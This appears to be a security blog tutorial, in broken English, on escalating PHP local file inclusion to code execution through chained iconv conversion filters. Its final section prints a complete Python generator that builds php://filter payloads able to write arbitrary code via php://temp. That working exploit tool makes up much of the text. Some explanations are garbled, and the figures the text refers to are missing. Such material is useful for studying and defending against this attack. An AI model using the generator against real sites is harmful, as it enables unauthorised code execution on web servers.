Hi everyone, today i am talking about to LFI, one technical attack web applications relvants to fuction read file. In PHP, LFI apear in function as include(), file_get_contents(),.... Let's go
I. Analysis
1. Language and convert in PHP
In the world, we have 7000 spoken languages. To everyone around world comunicate with each other is very diffcutls. ACISS have 256 character, however, but it is far too small to speak Japanese or German. Thus, to be able print character from other language, ever emotion, many encoding table were create to convert or even translit one character from other language to another when possible.
In PHP, the wrapper php://convert.iconv.*.* utilized to convert one strings from other language to other language. Systax of inconv
```php=
convert.iconv.<input-encoding>.<output-encoding> convert.iconv.<input-encoding>/<output-encoding>
```
Both notations are semantically equivalent.
2. Special in Base64 and UTF7 to UTF8
In PHP, when you decode one string to Base64. More character invaild (in Base64) in string will removed. Example:
```php=
$ php -r "echo base64_encode('base64');"
YmFzZTY0
$ php -r "echo base64_decode('YmFzZTY0');"
base64
$ php -r "echo base64_decode('@_>YmFzZTY0');"
base64
$ echo '@_>YmFzZTY0' > test.txt
$ php -r "echo file_get_contents('php://filter/convert.base64-decode/resource=test.txt');"
base64
```
However, if strings have character "=", function base_decode() will throw expection and it's will can't decode.
``` $ echo 'YmFzZTY0' > test.txt
$ php -r "echo file_get_contents('php://filter/convert.base64-decode/resource=test.txt');"
base64
$ php -r "echo base64_decode('YmFzZ==TY0');"
base64
$ echo 'YmFzZ==TY0' > test.txt
$ php -r "echo file_get_contents('php://filter/convert.base64-decode/resource=test.txt');"
Warning: file_get_contents(): stream filter (convert.base64-decode): invalid byte sequence in Command line code on line 1
$ echo 'YmFzZTY0==' > test.txt
$ php -r "echo file_get_contents('php://filter/convert.base64-decode/resource=test.txt');"
Warning: file_get_contents(): stream filter (convert.base64-decode): invalid byte sequence in Command line code on line 1
```
To slove this problem, we can utilized UTF7 to UTF8 after decode base64, because UTF7 to UTF8 will make character "=" to invalid charater in base64:
```
$ php -r "echo file_get_contents('php://filter/convert.iconv.UTF8.UTF7/convert.base64-decode/resource=test.txt');"
base64���
```
3. Prepend characters
Prepend characters is key in attack LFI use PHP filter. It's answer to question "why the hell woulld an encoding add characters?"
a. Unicode encoding:
In some cases, signture are prepend by encoding. Exapmple UTF-16, one path insert intial string call BOM (byte order mark). Digging a bit in the RFC 2781 referring to it:
```The Unicode Standard and ISO 10646 define the character "ZERO WIDTH
NON-BREAKING SPACE" (0xFEFF), which is also known informally as "BYTE
ORDER MARK" (abbreviated "BOM").This usage, suggested by Unicode
and ISO 10646 Annex F (informative), is to prepend a 0xFEFF character
to a stream of Unicode characters as a "signature"; a receiver of such
a serialized stream may then use the initial character both as a hint
that the stream consists of Unicode characters and as a way to recognize
the serialization order.
In serialized UTF-16 prepended with such a signature, the order is
big-endian if the first two octets are 0xFE followed by 0xFF; if they
are 0xFF followed by 0xFE, the order is little-endian. Note that
0xFFFE is not a Unicode character, precisely to preserve the
usefulness of 0xFEFF as a byte-order mark.
```
b. Korean Character encoding for Internet Messages
The Korean Character encoding for Internet Messages (ISO-2022-KR) is detailed by the following RFC: [RFC-1557].
```
It is assumed that the starting code of the message is ASCII. ASCII
and Korean characters can be distinguished by use of the shift
function. For example, the code SO will alert us that the upcoming
bytes will be a Korean character as defined in KSC 5601. To return
to ASCII the SI code is used.
Therefore, the escape sequence, shift function and character set used
in a message are as follows:
SO KSC 5601
SI ASCII
ESC $ ) C Appears once in the beginning of a line
before any appearance of SO characters.
```
Basically, it means that to be considered as ISO-20220-KR, a message has to start with the sequence "ESC $( C"
This encoding is one of the 7-bit ISO 2022 code versions along with ISO-2022-CN, ISO-2022-CN-EXT, ISO-2022-JP, ISO-2022-JP-1, ISO-2022-JP-2. However, In this encoding list, ISO-2022-KR is the only one prepending characters with the iconv PHP function.
II. Transform them and get what you want
Example: prepend 8 to your chain:

As image above, prepending an 8 can be achieved in 3 steps:
* Convert string to UTF8, prepend is \xff\xfe
* Convert string to LATIN6, path prepend \xff converted character kra 'ĸ'
* Convert the string back to UTF16 where the character 'ĸ' is equivalent to '\x01\x38'
* Finally, the chain will be interpreted character by character when printed, so '\x38' becomes '8'
A. Merge
Now, we discuss the diffculties when trying to prepend arbitrary characters.
On Hacktricks have one srcipt to generate other base64 characters [HACKTRICKS-LFI2RCE-FILTERS](https://book.hacktricks.wiki/en/pentesting-web/file-inclusion/lfi2rce-via-php-filters.html#improvements).
The bascis script is buruce force from prepend to generated character:

But this script did not check if the integrity of other characters from the initial string was preserved or not.
Example with chain by prepending 'b' to a string:

As we can see, the CP1399 codec is used, which is an alias to one of the Japanese version of the Extended Binary Coded Decimal Interchange Code (EBCDIC). It is used as a conversion table on this chain (really close to the IBM 1027 codec). This encoding was used on IBM systems. However, according to the Wikipedia page [EBCDIC-WIKI], there were compatibility issues between EBCDIC and ASCII. Indeed, as we can see in the following table, the hex value 42 is not the character 'B', but 。 in EBCDIC.

Now, we see what happend step by the step our START string when prepend 'b':

The UCS4 codec was not detailed here because it is really close to UTF32. It will only prepend null bytes on each character.

Although the character 'b' is successfully prepended, but the inital content is also changed. The string START was tranformed during the process.
Means this filter chain would destroy any character you created before this one.
B. Patching a main issue: the requirement of a valid file path
File storage is a problems in LFI. PHP wrapper require a valid file path to include/require.
```
$ php -r "echo require('php://filter/convert.base64-decode/resource=php://temp');"
1
```
By using the PHP wrapper php://temp as the input resource, it's easy in attack system.
III. Scripts
```python
#!/usr/bin/env python3
import argparse
import base64
import re
# - Useful infos -
# https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters
# https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT
# https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d
# No need to guess a valid filename anymore
file_to_use = "php://temp"
conversions = {
'0': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2',
'1': 'convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4',
'2': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921',
'3': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE',
'4': 'convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE',
'5': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2',
'6': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2',
'7': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4',
'8': 'convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB',
'A': 'convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213',
'a': 'convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE',
'B': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000',
'b': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'c': 'convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2',
'D': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213',
'd': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5',
'E': 'convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT',
'e': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937',
'F': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB',
'f': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213',
'g': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8',
'G': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90',
'H': 'convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213',
'h': 'convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE',
'I': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213',
'i': 'convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000',
'J': 'convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4',
'j': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16',
'K': 'convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE',
'k': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2',
'L': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC',
'l': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE',
'M':'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T',
'm':'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949',
'N': 'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4',
'n': 'convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61',
'O': 'convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775',
'o': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE',
'P': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB',
'p': 'convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4',
'q': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.GBK.CP932|convert.iconv.BIG5.UCS2',
'Q': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2',
'R': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4',
'r': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.ISO-IR-99.UCS-2BE|convert.iconv.L4.OSF00010101',
'S': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS',
's': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90',
'T': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103',
't': 'convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS',
'U': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943',
'u': 'convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61',
'V': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB',
'v': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2',
'W': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936',
'w': 'convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE',
'X': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932',
'x': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS',
'Y': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361',
'y': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT',
'Z': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16',
'z': 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937',
'/': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4',
'+': 'convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157',
'=': ''
}
def generate_filter_chain(chain, debug_base64 = False):
encoded_chain = chain
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"
for c in encoded_chain[::-1]:
filters += conversions[c] + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"
if not debug_base64:
# don't add the decode while debugging chains
filters += "convert.base64-decode"
final_payload = f"php://filter/{filters}/resource={file_to_use}"
return final_payload
def main():
# Parsing command line arguments
parser = argparse.ArgumentParser(description="PHP filter chain generator.")
parser.add_argument("--chain", help="Content you want to generate. (you will maybe need to pad with spaces for your payload to work)", required=False)
parser.add_argument("--rawbase64", help="The base64 value you want to test, the chain will be printed as base64 by PHP, useful to debug.", required=False)
args = parser.parse_args()
if args.chain is not None:
chain = args.chain.encode('utf-8')
base64_value = base64.b64encode(chain).decode('utf-8').replace("=", "")
chain = generate_filter_chain(base64_value)
print("[+] The following gadget chain will generate the following code : {} (base64 value: {})".format(args.chain, base64_value))
print(chain)
if args.rawbase64 is not None:
rawbase64 = args.rawbase64.replace("=", "")
match = re.search("^([A-Za-z0-9+/])*$", rawbase64)
if (match):
chain = generate_filter_chain(rawbase64, True)
print(chain)
else:
print ("[-] Base64 string required.")
exit(1)
if __name__ == "__main__":
main()
```